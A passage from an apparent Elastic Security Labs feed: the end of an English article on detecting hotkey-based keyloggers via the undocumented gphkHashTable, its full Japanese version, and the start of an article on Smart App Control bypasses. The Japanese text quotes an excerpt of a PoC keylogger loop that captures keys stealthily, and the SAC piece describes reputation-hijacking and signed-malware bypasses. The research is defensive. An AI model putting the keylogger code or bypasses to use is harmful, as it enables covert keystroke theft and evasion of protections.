<p><em>(This is a simplified explanation. For a more detailed discussion on sessions, please refer to <a href="https://googleprojectzero.blogspot.com/2016/01/raising-dead.html">James Forshaw’s blog post</a>.)</em></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image2.png" alt="Figure 6: Overview of Sessions. Session 0 is dedicated exclusively to service processes" /></p>
<p>Based on the above, <strong>win32kfull.sys</strong> is known as a <em>session driver</em>. This means that, for example, hotkey information registered in the session of the first logged-in user (Session 1) can only be accessed from within that same session. So, how can we work around this limitation? In such cases, <a href="https://eversinc33.com/posts/kernel-mode-keylogging.html">it is known</a> that <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-kestackattachprocess"><strong>KeStackAttachProcess</strong></a> can be used.</p>
<p><strong>KeStackAttachProcess</strong> allows the current thread to temporarily attach to the address space of a specified process. If we can attach to a GUI process in the target session — more precisely, a process that has loaded <strong>win32kfull.sys</strong> — then we can access <strong>win32kfull.sys</strong> and its associated data within that session. For our implementation, assuming that only one user is logged in, we decided to locate and attach to <strong>winlogon.exe</strong>, the process responsible for handling user logon operations.</p>
<h3>Enumerating Registered Hotkeys</h3>
<p>Once we have successfully attached to the winlogon.exe process and determined the address of <strong>gphkHashTable</strong>, the next step is simply scanning <strong>gphkHashTable</strong> to check the registered hotkeys. Below is an excerpt of that code:</p>
<pre><code class="language-c">BOOL CheckRegisteredHotKeys(_In_ const PVOID&amp; gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast&lt;PVOID*&gt;(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j &lt; 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast&lt;PHOT_KEY&gt;(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY&amp; hk)
{
    if (MmIsAddressValid(hk-&gt;pNext)) {
        CheckHotkeyNode(hk-&gt;pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk-&gt;vk &gt;= 0x30) &amp;&amp; (hk-&gt;vk &lt;= 0x39) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk-&gt;vk &gt;= 0x41) &amp;&amp; (hk-&gt;vk &lt;= 0x5A) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) &amp;&amp; hotkeyCounter &gt;= 36)
{
   detected = TRUE;
   goto Cleanup;
}
</code></pre>
<p>The code itself is straightforward: it iterates through each index of the hash table, following the linked list to access every <strong>HOT_KEY</strong> object, and checks whether the registered hotkeys correspond to alphanumeric keys without any modifiers. In our detection tool, if every alphanumeric key is registered as a hotkey, an alert is raised, indicating the possible presence of a hotkey-based keylogger. For simplicity, this implementation only targets alphanumeric key hotkeys, although it would be easy to extend the tool to check for hotkeys with modifiers such as <strong>SHIFT</strong>.</p>
<h3>Detecting Hotkeyz</h3>
<p>The detection tool (Hotkey-based Keylogger Detector) has been released below. Detailed usage instructions are provided as well. Additionally, this research was presented at <a href="https://nullcon.net/goa-2025/speaker-windows-keylogger-detection">NULLCON Goa 2025</a>, and the <a href="https://docs.google.com/presentation/d/1B0Gdfpo-ER2hPjDbP_NNoGZ8vXP6X1_BN7VZCqUgH8c/edit?usp=sharing">presentation slides</a> are available.</p>
<p><a href="https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector">https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector</a></p>
<p>The following is a demo video showcasing how the Hotkey-based Keylogger Detector detects Hotkeyz.</p>
<p><a href="https://drive.google.com/file/d/1koGLqA5cPlhL8C07MLg9VDD9-SW2FM9e/view?usp=drive_link">DEMO_VIDEO.mp4</a></p>
<h2>Acknowledgments</h2>
<p>We would like to express our heartfelt gratitude to Jonathan Bar Or for reading our previous article, sharing his insights on hotkey-based keyloggers, and generously publishing the PoC tool <strong>Hotkeyz</strong>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/Security Labs Images 12.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[未公開のカーネルデータ構造を使ったホットキー型キーロガーの検知]]></title>
            <link>https://www.elastic.co/kr/security-labs/detecting-hotkey-based-keyloggers-jp</link>
            <guid>detecting-hotkey-based-keyloggers-jp</guid>
            <pubDate>Tue, 04 Feb 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[本記事では、ホットキー型キーロガーとは何かについてと、その検知方法について紹介します。具体的には、ホットキー型キーロガーがどのようにしてキー入力を盗み取るのかを解説した後、カーネルレベルに存在する未公開(Undocumented)のホットキーテーブルを活用した検知手法について説明します。]]></description>
            <content:encoded><![CDATA[<h2>未公開のカーネルデータ構造を使った</h2>
<h2>ホットキー型キーロガーの検知</h2>
<p>本記事では、ホットキー型キーロガーとは何かについてと、その検知方法について紹介します。具体的には、ホットキー型キーロガーがどのようにしてキー入力を盗み取るのかを解説した後、カーネルレベルに存在する未公開(Undocumented)のホットキーテーブルを活用した検知手法について説明します。</p>
<h2>はじめに</h2>
<p>　Elastic Security Labsでは2024年5月、<a href="https://www.elastic.co/kr/guide/en/integrations/current/endpoint.html">Elastic Defend</a>のバージョン 8.12 より追加された、Windows上で動作するキーロガーの検知を強化する新機能を紹介する<a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp">記事</a>を公開しました 。具体的には、サイバー攻撃で一般的に使われる4種類のキーロガー(ポーリング型キーロガー、フッキング型キーロガー、Raw Input Modelを用いたキーロガー、DirectInputを用いたキーロガー)を挙げ、それらに対する私たちが提供した検知手法についてを解説しました。具体的には<a href="https://learn.microsoft.com/ja-jp/windows-hardware/drivers/devtest/event-tracing-for-windows--etw-">Event Tracing for Windows</a> (ETW)における、Microsoft-Windows-Win32kプロバイダを用いた振る舞い検知の方法についてを紹介しました。<br />
　記事公開後、大変光栄なことに記事がMicrosoft社のPrincipal Security Researcherである<a href="https://jonathanbaror.com/">Jonathan Bar Or</a>氏の目に留まり、「ホットキー型キーロガーもある」といった貴重なご意見とともに、そのPoCコードも公開してくださりました。そこで本記事では、氏が公開したホットキー型キーロガーのPoCコードである「<a href="https://github.com/yo-yo-yo-jbo/hotkeyz">Hotkeyz</a>」 をもとに、本キーロガーの検知手法の一案についてを述べたいと思います。</p>
<h2>ホットキー型キーロガーの概要</h2>
<h3>そもそもホットキーとは何か？</h3>
<p>　ホットキー型キーロガーについて説明する前に、まずホットキーとは何かを解説します。ホットキーとは、キーボードショートカットの一種であり、コンピュータにおいて、特定の機能を直接呼び出して実行させるキーまたはキーの組み合わせのことを指します。例えばWindowsにおいてタスク(ウィンドウ)を切り替える際に「<strong>Alt + Tab</strong>」を押している人も多いかと思います。この時使っているこの「<strong>Alt + Tab</strong>」が、タスク切り替え機能を直接呼び出す「ホットキー」にあたります。</p>
<p><em>(注: ホットキー以外にも、キーボードショートカットは存在しますが、本記事ではそれらは対象外です。また本記事に記載の事項はすべて、筆者が検証に利用した環境である、仮想化ベースのセキュリティが動作していないWindows 10 version 22H2 OS Build 19045.5371が前提になります。他のWindowsのバージョンではまた内部の構造や挙動が違う場合があること、ご注意ください。)</em></p>
<h3>任意のホットキーが登録できることを悪用する</h3>
<p>　先ほどの例のようにWindowsで予め設定されたホットキーを使う以外にも、実は自分で任意のホットキーを登録することも可能です。登録方法は様々ありますが、<a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-registerhotkey">RegisterHotKey</a>というWindows APIを使えば、指定のキーをホットキーとして登録することができます。例えば、以下が<code>RegisterHotKey</code> APIを使って「A」(<a href="https://learn.microsoft.com/ja-jp/windows/win32/inputdev/virtual-key-codes">virtual-key code</a>で0x41)キーを、グローバルなホットキーとして登録するためのコードの例です。</p>
<pre><code class="language-c">/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);
</code></pre>
<p>　ホットキーとして登録後、登録されたキーが押下された場合、<code>RegisterHotKey</code> APIの第一引数で指定したウィンドウ(NULLの場合はホットキー登録時のスレッド)の<a href="https://learn.microsoft.com/ja-jp/windows/win32/winmsg/about-messages-and-message-queues">メッセージキュー</a>に、<a href="https://learn.microsoft.com/ja-jp/windows/win32/inputdev/wm-hotkey">WM_HOTKEYメッセージ</a>が届くようになります。以下は実際に、メッセージキューにWM_HOTKEY メッセージが来ていないかを<a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-getmessage">GetMessage</a> APIを使って確認し、届いていた場合、WM_HOTKEYメッセージに内包されていた virtual-key code(今回の場合「0x41」)を取り出しているコード(メッセージループ)になります。</p>
<pre><code class="language-c">MSG msg = { 0 };
while (GetMessage(&amp;msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout &lt;&lt; &quot;WM_HOTKEY received! Virtual-Key Code: 0x&quot;
            &lt;&lt; std::hex &lt;&lt; vkCode &lt;&lt; std::dec &lt;&lt; std::endl;
    }
}
</code></pre>
<p>　これは言い換えると、例えばメモ帳アプリに文章を書く際、Aキーから入力された文字は、文字としての入力ではなく、グローバルなホットキーとして認識されることになります。</p>
<p>　今回は「A」のみをホットキーとして登録しましたが、複数のキー(BやCやD)を同時に個々のホットキーとして登録することも可能です。これはつまり、<code>RegisterHotKey</code> APIでホットキーとして登録可能な範囲の任意のキー(virtual-key code)の入力は、すべてグローバルなホットキーとして横取りすることも可能であるということです。そしてホットキー型キーロガーはこの性質を悪用して、ユーザから入力されたキーを盗み取ります。<br />
　筆者が手元の環境で試した限りは、英数字と基本的な記号キーだけでなく、それらにSHIFT修飾子をつけたすべてキーが<code>RegisterHotKey</code> APIでホットキーとして登録可能でした。そのため、キーロガーとして問題なく、情報の窃取に必要なキーの監視ができると言えるでしょう。</p>
<h3>密かにキーを盗み取る</h3>
<p>　ホットキー型キーロガーがキーを盗み取る実際の流れについてを、Hotkeyzを例に紹介します。<br />
Hotkeyzでは最初に、各英数字キーに加えて、一部のキー(VK_SPACEやVK_RETURNなど)のvirtual-key codeを、<code>RegisterHotKey</code> APIを使い個々のホットキーとして登録します。その後キーロガー内のメッセージループにて、登録されたホットキーのWM_HOTKEYメッセージが、メッセージキューに到着していないかを<a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-peekmessagew">PeekMessageW</a> APIを使って確認します。そしてWM_HOTKEYメッセージが来ていた場合、メッセージに内包されているvirtual-key codeを取り出して、最終的にはそれをテキストファイルに保存します。以下がメッセージループ内のコードのコードです。特に重要な部分を抜粋して掲載しています。</p>
<pre><code class="language-c">while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&amp;tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) &amp; 0xFFFF0000) &gt;&gt; 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L&quot;RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).&quot;, cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &amp;cCurrVk, sizeof(cCurrVk), &amp;cbBytesWritten, NULL))
  {
....
</code></pre>
<p>　ここで特筆するべき点としては、ユーザにキーロガーの存在を気取られないため、メッセージからvirtual-key codeを取り出した時点で、いったんそのキーのホットキー登録を<a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-unregisterhotkey">UnregisterHotKey</a> APIを使って解除し、その上で<a href="https://learn.microsoft.com/ja-jp/windows/win32/api/winuser/nf-winuser-keybd_event">keybd_event</a>を使ってキーを送信することです。これにより、ユーザからは問題無くキーが入力出来ているように見え、キーが裏で窃取されていることに気が付かれにくくなります。そしてキーを送信した後は再びそのキーを<code>RegisterHotKey</code> APIを使ってホットキーとして登録し、再びユーザからの入力を待ちます。以上が、ホットキー型キーロガーの仕組みです。</p>
<h2><strong>ホットキー型キーロガーの検知手法</strong></h2>
<p>　ホットキー型キーロガーとは何かやその仕組みについて理解したところで、次にこれをどのように検知するかについてを説明します。</p>
<h3>ETWではRegisterHotKey APIは監視していない</h3>
<p>　以前の記事で書いた方法と同様に、まずはホットキー型キーロガーも<a href="https://learn.microsoft.com/ja-jp/windows/win32/etw/about-event-tracing">Event Tracing for Windows</a> (ETW) を利用して検知が出来ないかを検討・調査しました。その結果、ETWでは<code>RegisterHotKey</code> APIや<code>UnRegisterHotKey</code> APIを監視していないことがすぐに判明しました。Microsoft-Windows-Win32k プロダイバーのマニフェストファイルの調査に加えて、<code>RegisterHotKey</code>のAPIの内部(具体的にはwin32kfull.sysにある<code>NtUserRegisterHotKey</code>)をリバースエンジニアリングをしたものの、これらのAPIが実行される際、ETWのイベントを送信しているような形跡は残念ながら見つかりませんでした。<br />
　以下の図は、ETWで監視対象となっている<code>GetAsyncKeyState</code>(<code>NtUserGetAsyncKeyState</code>)と、<code>NtUserRegisterHotKey</code>の逆コンパイル結果を比較したものを示しています。<code>NtUserGetAsyncKeyState</code>の方には関数の冒頭に、<code>EtwTraceGetAsyncKeyState</code>というETWのイベント書き出しに紐づく関数が存在しますが、<code>NtUserRegisterHotKey</code>には存在しないのが見て取れます。</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image3.png" alt="図1: NtUserGetAsyncKeyStateとNtUserRegisterHotKeyの逆コンパイル結果の比較" />
　<br />
　Microsoft-Windows-Win32k 以外のETWプロバイダーを使って、間接的に<code>RegisterHotKey</code> APIを呼び出しを監視する案もでたものの、次に紹介する、ETWを使わず「ホットキーテーブル」を利用した検知手法が、<code>RegisterHotKey</code> APIを監視するのと同様かそれ以上の効果が得られることが分かり、最終的にはこの案を採用することにしました。</p>
<h3>ホットキーテーブル(gphkHashTable)を利用した検知</h3>
<p>　ETWでは<code>RegisterHotKey</code> APIの呼び出しを直接監視出来ないことが判明した時点で、ETWを利用せずに検知する方法を検討することにしました。検討の最中、「そもそも登録されたホットキーの情報がどこかに保存されているのではないか？」「もし保存されているとしたら、その情報が検知に使えるのではないか？」という考えに至りました。その仮説をもとに調査した結果、すぐに<code>NtUserRegisterHotkey</code>内にて<code>gphkHashTable</code>というラベルがつけられたハッシュテーブルを発見することが出来ました。Microsoft社が公開しているオンラインのドキュメント類を調査しても<code>gphkHashTable</code>についての情報はなかったため、これは未公開(undocumented)のカーネルデータ構造のようです。</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image1.png" alt="図2: ホットキーテーブルgphkHashTable。NtUserRegisterHotKey内で呼ばれたRegisterHotKey関数内にて発見" /></p>
<p>　リバースエンジニアリングをした結果、このハッシュテーブルは、登録されたホットキーの情報を持つオブジェクトを保存しており、各オブジェクトは<code>RegisterHotKey</code> APIの引数にて指定されたvirtual-key codeや修飾子の情報を保持していることが分かりました。以下の図(右)がホットキーのオブジェクト(<strong>HOT_KEY</strong>と命名)の構造体の定義の一部と、図(左)が実際にwindbg上で<code>gphkHashTable</code>にアクセスした上で、登録されたホットキーのオブジェクトを見た時の様子です。</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image4.png" alt="図3: ホットキーオブジェクトの詳細。Windbg画面(図左)とHOT_KEY構造体の詳細" /></p>
<p>　リバースエンジニアリングをした結果をまとめると、ghpkHashTableは図4のような構造になっていることがわかりました。具体的には、<code>RegisterHotKey</code> APIで指定されたvirtual-key codeに対して0x80の余剰演算をした結果をハッシュテーブルのインデックスにしていました。そして同じインデックスを持つホットキーオブジェクトを連結リストで結ぶことで、virtual-key codeが同じでも、修飾子が違うホットキーの情報も保持・管理出来るようになっています。</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image6.png" alt="図4: gphkHashTableの構造" /></p>
<p>　つまり<code>gphkHashTable</code>で保持している全てのHOT_KEYオブジェクトを走査すれば、登録されている全ホットキーの情報が取得できるということになります。取得した結果、主要なキー(例えば単体の英数字キー）全てが個々のホットキーとして登録されていれば、ホットキー型キーロガーが動作していることを示す強い根拠となります。</p>
<h2>検知ツールを作成する</h2>
<p>　では次に、実際に検知ツールの方を実装していきます。<code>gphkHashTable</code>自体はカーネル空間に存在するため、ユーザモードのアプリケーションからはアクセス出来ません。そのため検知のために、デバイスドライバを書くことにしました。具体的には<code>gphkHashTable</code>のアドレスを取得した後、ハッシュテーブルに保存されている全オブジェクトを走査した上で、ホットキーとして登録されている英数字キーの数が一定数以上ならば、ホットキー型キーロガーが存在する可能性がある事を知らせてくるデバイスドライバを作成することにしました。</p>
<h3>gphkHashTableのアドレスを取得する方法</h3>
<p>　検知ツールを作成するにあたり、最初に直面した課題としては「gphkHashTableのアドレスをどのようにして取得すればよいのか？」ということです。悩んだ結果、<strong>win32kfull.sys</strong>のメモリ空間内でgphkHashTableにアクセスしている命令から直接gphkHashTableのアドレスを取得することにしました。<br />
　リバースエンジニアリングした結果、<code>IsHotKey</code>という関数内では、関数の冒頭部分にあるlea命令(lea rbx, gphkHashTable)にて、gphkHashTableのアクセスしていることがわかりました。この命令のオプコードバイト(0x48, 0x8d, 0x1d)部分をシグネチャに該当行を探索して、得られた32bit(4バイト)のオフセットからgphkHashTableのアドレスを算出することにしました。</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image5.png" alt="図5: IsHotKey関数内 " /></p>
<p>　加えて、IsHotKey関数自体もエクスポート関数でないため、そのアドレスも何らかの方法で取得しなければいけません。そこでさらなるリバースエンジニアリングの結果、<code>EditionIsHotKey</code>というエクスポートされた関数内で、<code>IsHotKey</code>関数が呼ばれていることがわかりました。そこでEditionIsHotKey関数から前述と同様の方法で、IsHotKey関数のアドレスを算出することにしました。(補足ですが、<strong>win32kfull.sys</strong>のベースアドレスに関しては<code>PsLoadedModuleList</code>というAPIで探せます。)</p>
<p>　## <strong>win32kfull.sys</strong>のメモリ空間にアクセスするには</p>
<p>　<strong>gphkHashTable</strong>のアドレスを取得する方法について検討が終わったところで、実際に<strong>win32kfull.sys</strong>のメモリ空間にアクセスして、<strong>gphkHashTable</strong>のアドレスを取得するためのコードを書き始めました。この時直面した課題としては、<strong>win32kfull.sys</strong>は「セッションドライバ」であるという点ですが、ここではまず「セッション」とは何かについて、簡単に説明します。<br />
　Windowsでは一般的にユーザがログインした際、ユーザ毎に個別に「セッション」(1番以降のセッション番号)が割り当てられます。かなり大雑把に説明すると、最初にログインしたユーザには「セッション１」が割り当てられ、その状態で別のユーザがログインした場合今度は「セッション２」が割り当てられます。そして各ユーザは個々のセッション内で、それぞれのデスクトップ環境を持ちます。<br />
　この時、セッション別(ログインユーザ別)に管理するべきカーネルのデータは、カーネルメモリ内の「セッション空間」というセッション別の分離したメモリ空間で管理され、win32k ドライバが管理しているようなGUIオブジェクト(ウィンドウ、マウス・キーボード入力の情報等)もこれに該当します。これにより、ユーザ間で画面や入力情報が混ざることがないのです。(かなり大まかな説明のため、より詳しくセッションについて知りたい方はJames Forshaw氏の<a href="https://googleprojectzero.blogspot.com/2016/01/raising-dead.html">こちらのブログ記事</a>を読むことをおすすめします。)</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image2.png" alt="図6: セッションの概要。 セッション0はサービスプロセス専用のセッション" />
　　<br />
以上の背景から、<strong>win32kfull.sys</strong>は「セッションドライバ」と呼ばれています。つまり、例えば最初のログインユーザのセッション(セッション1)内で登録されたホットキーの情報は、同じセッション内からしかアクセスできないということです。ではどうすれば良いのかというと、このような場合、<a href="https://learn.microsoft.com/ja-jp/windows-hardware/drivers/ddi/ntifs/nf-ntifs-kestackattachprocess">KeStackAttachProcess</a>が利用できることが<a href="https://eversinc33.com/posts/kernel-mode-keylogging.html">知られています</a>。<br />
　KeStackAttachProcessは、現在のスレッドを指定のプロセスのアドレス空間に一時的にアタッチすることが出来ます。この時、対象のセッションにいるGUIプロセス、より正確には<strong>win32kfull.sys</strong>をロードしているプロセスにアタッチすることが出来れば、対象セッションの<strong>win32kfull.sys</strong>やそのデータにアクセスすることが出来ます。今回は、ログインユーザが１ユーザであることを仮定して、各ユーザのログオン操作を担うプロセスである<strong>winlogon.exe</strong>を探してアタッチすることにしました。</p>
<h3>登録されているホットキーを確認する</h3>
<p>　<strong>winlogon.exe</strong>のプロセスにアタッチし、<strong>gphkHashTable</strong>のアドレスを特定出来た後は、後は<strong>gphkHashTable</strong>をスキャンして登録されたホットキーを確認するだけです。以下がその抜粋版のコードです。</p>
<pre><code class="language-c">BOOL CheckRegisteredHotKeys(_In_ const PVOID&amp; gphkHashTableAddr)
{
-[skip]-
    // Cast the gphkHashTable address to an array of pointers.
    PVOID* tableArray = static_cast&lt;PVOID*&gt;(gphkHashTableAddr);
    // Iterate through the hash table entries.
    for (USHORT j = 0; j &lt; 0x80; j++)
    {
        PVOID item = tableArray[j];
        PHOT_KEY hk = reinterpret_cast&lt;PHOT_KEY&gt;(item);
        if (hk)
        {
            CheckHotkeyNode(hk);
        }
    }
-[skip]-
}

VOID CheckHotkeyNode(_In_ const PHOT_KEY&amp; hk)
{
    if (MmIsAddressValid(hk-&gt;pNext)) {
        CheckHotkeyNode(hk-&gt;pNext);
    }

    // Check whether this is a single numeric hotkey.
    if ((hk-&gt;vk &gt;= 0x30) &amp;&amp; (hk-&gt;vk &lt;= 0x39) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
    // Check whether this is a single alphabet hotkey.
    else if ((hk-&gt;vk &gt;= 0x41) &amp;&amp; (hk-&gt;vk &lt;= 0x5A) &amp;&amp; (hk-&gt;modifiers1 == 0))
    {
        KdPrint((&quot;[+] hk-&gt;id: %u hk-&gt;vk: %x\n&quot;, hk-&gt;id, hk-&gt;vk));
        hotkeyCounter++;
    }
-[skip]-
}
....
if (CheckRegisteredHotKeys(gphkHashTableAddr) &amp;&amp; hotkeyCounter &gt;= 36)
{
   detected = TRUE;
   goto Cleanup;
}
</code></pre>
<p>　コード自体は難しくなく、ハッシュテーブルの各インデックスの先頭から順に、連結リストをたどりながらすべての<strong>HOT_KEY</strong>オブジェクトにアクセスして、登録されているホットキーが単体の英数字キーか否かを確認しています。作成した検知ツールでは、すべての単体英数字キーがホットキーとして登録<br />
されていた場合、ホットキー型キーロガーが存在するとしてアラートを挙げます。また、今回実装の簡略化のため、英数字単体キーのホットキーのみを対象としていますが、SHIFTなどの修飾子付きのホットキーも容易に調べることが可能です。</p>
<h3>Hotkeyzを検知する</h3>
<p>　検知ツール(Hotkey-based Keylogger Detector)は以下にて公開しました。使い方も以下に記載していますので、興味ある方はぜひご覧ください。加えて本研究は<a href="https://nullcon.net/goa-2025/speaker-windows-keylogger-detection">NULLCON Goa 2025</a>でも発表しましたので、その<a href="https://docs.google.com/presentation/d/1B0Gdfpo-ER2hPjDbP_NNoGZ8vXP6X1_BN7VZCqUgH8c/edit?usp=sharing">発表スライド</a>も併せてご覧いただけます。</p>
<p>*<a href="https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector">https://github.com/AsuNa-jp/HotkeybasedKeyloggerDetector</a></p>
<p>　最後に、本ツールを用いて実際にHotkeyzを検知する様子を収録したデモ動画が以下になります。</p>
<p><a href="https://drive.google.com/file/d/1koGLqA5cPlhL8C07MLg9VDD9-SW2FM9e/view?usp=drive_link">DEMO_VIDEO.mp4</a></p>
<h2>謝辞</h2>
<p>　<a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection-jp">前回の記事</a>を読んで下さり、その上でホットキー型キーロガーの手法について教えてくださり、その上そのPoCとなるHotkeyzを公開してくださった、Jonathan Bar Or氏に心より感謝致します。</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers-jp/Security Labs Images 12.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Dismantling Smart App Control]]></title>
            <link>https://www.elastic.co/kr/security-labs/dismantling-smart-app-control</link>
            <guid>dismantling-smart-app-control</guid>
            <pubDate>Tue, 06 Aug 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article will explore Windows Smart App Control and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Reputation-based protections like Elastic’s <a href="https://www.elastic.co/kr/guide/en/security/current/configure-endpoint-integration-policy.html#behavior-protection">reputation service</a> can significantly improve detection capabilities while maintaining low false positive rates. However, like any protection capability, weaknesses exist and bypasses are possible. Understanding these weaknesses allows defenders to focus their detection engineering on key coverage gaps. This article will explore Windows <a href="https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003">Smart App Control</a> and SmartScreen as a case study for researching bypasses to reputation-based systems, then demonstrate detections to cover those weaknesses.</p>
<h3>Key Takeaways:</h3>
<ul>
<li>Windows Smart App Control and SmartScreen have several design weaknesses that allow attackers to gain initial access with no security warnings or popups.</li>
<li>A bug in the handling of LNK files can also bypass these security controls</li>
<li>Defenders should understand the limitations of these OS features and implement detections in their security stack to compensate</li>
</ul>
<h2>SmartScreen/SAC Background</h2>
<p>Microsoft <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/">SmartScreen</a> has been a built-in OS feature since Windows 8. It operates on files that have the <a href="https://learn.microsoft.com/en-us/microsoft-365-apps/security/internet-macros-blocked#mark-of-the-web-and-zones">“Mark of the Web”</a> (MotW) and are clicked on by users. Microsoft introduced Smart App Control (SAC) with the release of Windows 11. SAC is, in some ways, an evolution of SmartScreen. Microsoft <a href="https://support.microsoft.com/en-us/topic/what-is-smart-app-control-285ea03d-fa88-4d56-882e-6698afdb7003">says</a> it “adds significant protection from new and emerging threats by blocking apps that are malicious or untrusted.” It works by querying a Microsoft cloud service when applications are executed. If they are known to be safe, they are allowed to execute; however, if they are unknown, they will only be executed if they have a valid code signing signature. When SAC is enabled, it replaces and disables Defender SmartScreen.</p>
<p>Microsoft exposes undocumented APIs for querying the trust level of files for SmartScreen and Smart App Control. To help with this research, we developed a utility that will display the trust of a file. The source code for this utility is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-check/rep-check.cpp">here</a>.</p>
<h2>Signed Malware</h2>
<p>One way to bypass Smart App Control is to simply sign malware with a code-signing certificate. Even before SAC, there has been a trend towards attackers signing their malware to evade detection. More recently, attackers have routinely obtained Extend Validation (EV) signing certificates. EV certs require proof of identity to gain access and can only exist on specially designed hardware tokens, making them difficult to steal. However, attackers have found ways to impersonate businesses and purchase these certificates. The threat group behind <a href="https://www.elastic.co/kr/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant">SolarMarker</a> has leveraged <a href="https://squiblydoo.blog/2024/05/13/impostor-certs/">over 100</a> unique signing certificates across their campaigns. Certificate Authorities (CAs) should do more to crack down on abuse and minimize fraudulently-acquired certificates. More public research may be necessary to apply pressure on the CAs who are most often selling fraudulent certificates.</p>
<h2>Reputation Hijacking</h2>
<p>Reputation hijacking is a generic attack paradigm on reputation-based malware protection systems. It is analogous to the <a href="https://web.archive.org/web/20171028135605/https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/MattGraeber.CaseySmith.pdf">misplaced trust</a> research by Casey Smith and others against application control systems, as well as the <a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf">vulnerable driver research</a> from Gabriel Landau and I. Unfortunately, the attack surface in this case is even larger. Reputation hijacking involves finding and repurposing apps with a good reputation to bypass the system. To work as an initial access vector, one constraint is that the application must be controlled without any command line parameters—for example, a script host that loads and executes a script at a predictable file path.</p>
<p>Script hosts are an ideal target for a reputation hijacking attack. This is especially true if they include a foreign function interface (FFI) capability. With FFI, attackers can easily load and execute arbitrary code and malware in memory. Through searches in VirusTotal and GitHub, we identified many script hosts that have a known good reputation and can be co-opted for full code execution. This includes Lua, Node.js, and AutoHotkey interpreters. A sample to demonstrate this technique is available <a href="https://github.com/joe-desimone/rep-research/blob/ea8c70d488a03b5f931efa37302128d9e7a33ac0/rep-hijacking/poc-rep-hijack-jam.zip">here</a>.</p>
